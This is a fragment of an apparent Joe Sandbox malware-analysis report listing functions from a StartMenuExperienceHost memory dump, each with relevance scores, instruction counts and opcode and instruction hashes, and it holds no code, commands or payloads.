                  • Instruction ID: 5998cd060854e727817007e2e647b147d2f39b6fd47d9c1d3e35379a1a6bafff
                  • Opcode Fuzzy Hash: e3948c950e0cc9470a875606b072241a5849c427266a2f87d9581939568fdf0a
                  • Instruction Fuzzy Hash: 40A19C70D0D69A8FE795FB3488596B97BE0FF95340F4445BAD808D71D2EF38A9448B04
                  Function 00007FF848F1AD5D Relevance: .2, Instructions: 247COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5374360c821a36930174b99832543e09cdc31ff28943a98fb83427c62cdbaada
                  • Instruction ID: 853219c3052abd448f6b5994129e0c28e157c5db8276ead86b7559207b57cc11
                  • Opcode Fuzzy Hash: 5374360c821a36930174b99832543e09cdc31ff28943a98fb83427c62cdbaada
                  • Instruction Fuzzy Hash: 8D81893190DA8E8FEB95FF2498592FA7BB0FF59340F0005BAE808C71A2DB39A5448745
                  Function 00007FF848F12AE0 Relevance: .2, Instructions: 222COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 835766031ac8b635f6eebecb143c70f6b7ef2e4d0a3f3e7d9b1e64228806b75c
                  • Instruction ID: a0fbddaf0fd89c8247f0bfbbac7dbe843dbf8426d3ab7e48f47a1ff224ef096a
                  • Opcode Fuzzy Hash: 835766031ac8b635f6eebecb143c70f6b7ef2e4d0a3f3e7d9b1e64228806b75c
                  • Instruction Fuzzy Hash: F471BD3080DA8E8FEB85EB2898596F97BE0FF19340F1404BAC40AC71D2EF39A584C715
                  Function 00007FF848F1AD1D Relevance: .2, Instructions: 222COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b65ffc9cea2e89ea548490dce7739707f847b558950495e1cef69d3bf5c73c0c
                  • Instruction ID: 6d8cb67d9678939d1ef882f99159b97e360a575d83053a57da2e34565e655e24
                  • Opcode Fuzzy Hash: b65ffc9cea2e89ea548490dce7739707f847b558950495e1cef69d3bf5c73c0c
                  • Instruction Fuzzy Hash: 1B718A3190DA8E8FEB95EF2498582BA7BB1FF59340F0005BAD809D71A2DB39A544C745
                  Function 00007FF848F12A80 Relevance: .2, Instructions: 205COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 50eb1cf591878bfe3ed8ada88ec1755c75da72b15ed101fa1417b5a20a75530f
                  • Instruction ID: 97fc8ce745ba4857e8a652f568f1bb25af2fbc8864fbf9cd515b524f295d8724
                  • Opcode Fuzzy Hash: 50eb1cf591878bfe3ed8ada88ec1755c75da72b15ed101fa1417b5a20a75530f
                  • Instruction Fuzzy Hash: 0E61D43180E78A9FE791BB78A8552FA7FB0EF06364F0405BBD448C60D3EF2964488759
                  Function 00007FF848F12EB9 Relevance: .2, Instructions: 175COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ff52559536dddb3142983056f9b1fe5609a0b98907b02845298d688e4f622c5
                  • Instruction ID: 3141621ce6eca589b23bd0069934099920b751871ce817621fae1063eb6972b8
                  • Opcode Fuzzy Hash: 2ff52559536dddb3142983056f9b1fe5609a0b98907b02845298d688e4f622c5
                  • Instruction Fuzzy Hash: 5151B030D1D28A8FE751EBB488192FA7BF0EF16354F0405BAD448D61D2EB7CA948C755
                  Function 00007FF848F10500 Relevance: .2, Instructions: 170COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5964cbe2f09c7669f05a26833ea40ac1679f2fd3b7f8d70ca58c574ca14d9f05
                  • Instruction ID: 416ccd778813f9b1cb7a2c36dad959c286533b409ec1a0e6805debe9b27fa5bf
                  • Opcode Fuzzy Hash: 5964cbe2f09c7669f05a26833ea40ac1679f2fd3b7f8d70ca58c574ca14d9f05
                  • Instruction Fuzzy Hash: 17518D3090D68E8FEB56EFB488586BA7BE0FF19351F1544BBD409C60E2EB38A954C711
                  Function 00007FF848F1290D Relevance: .1, Instructions: 111COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d0e352a7cb4941822440ae12f8e7e3e8f21e9a08eee778636b01ca1eff23d1b8
                  • Instruction ID: 09958d9fdfe3e644ed374d0c96d0a16c662f56a67275c72d9ef5b2795c26826e
                  • Opcode Fuzzy Hash: d0e352a7cb4941822440ae12f8e7e3e8f21e9a08eee778636b01ca1eff23d1b8
                  • Instruction Fuzzy Hash: BA310535A0D2958FD741FB68A4942E93BB0EF92361F4846B3C148CE093DB2C98498365
                  Function 00007FF848F104F8 Relevance: .1, Instructions: 95COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fc6ce5dfb5ab64e465bf8819da4499762f938a84fcaf5dc6f6e23dfba79d74a1
                  • Instruction ID: 162b8ef1582d41d3066fc12f98ec6747aeadcb94fd3cbbab71d97c29cd8f1e5d
                  • Opcode Fuzzy Hash: fc6ce5dfb5ab64e465bf8819da4499762f938a84fcaf5dc6f6e23dfba79d74a1
                  • Instruction Fuzzy Hash: 3D31A73081D78E8FD75AEFB488152BA3BA0FF15351F1405BBE819C61D2EB38A958C751
                  Function 00007FF848F10608 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9405bbddaa8fba91912f401ee0841c2c9221bcf064e1769fa6d4cb4d3483d5d6
                  • Instruction ID: 05538ea9bee0befab78a82921522a725c2962b35276467e52371e7104de48e19
                  • Opcode Fuzzy Hash: 9405bbddaa8fba91912f401ee0841c2c9221bcf064e1769fa6d4cb4d3483d5d6
                  • Instruction Fuzzy Hash: 3C11BF3081D78E8FEB59AFB494082BA37A4FF05311F10087BE809C10D2DF38A958C701
                  Function 00007FF848F10610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ca702fb6ba28495429d77f724d9259ef0d663f2670dd0bf10f06d1e01f826107
                  • Instruction ID: 01b9fcb46e0d6a6c0dc780a86962a5a678f58a11b661e2a264087fd2a448c08a
                  • Opcode Fuzzy Hash: ca702fb6ba28495429d77f724d9259ef0d663f2670dd0bf10f06d1e01f826107
                  • Instruction Fuzzy Hash: 2D016930819A0E9EEB48EBA484586B9B7A0FF18355F20087FE81EC21D5DF35A994C714
                  Function 00007FF848F186C8 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction ID: 3560dcd49c59c3fffb9ace531b9df8c6946265adf002e5cfcfdd28e93aa96ba6
                  • Opcode Fuzzy Hash: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction Fuzzy Hash: B8E059B0D1D95E8EDBA5EB5889847A8B6B1BB59344F6040F9821DE21D4DB342EC18F48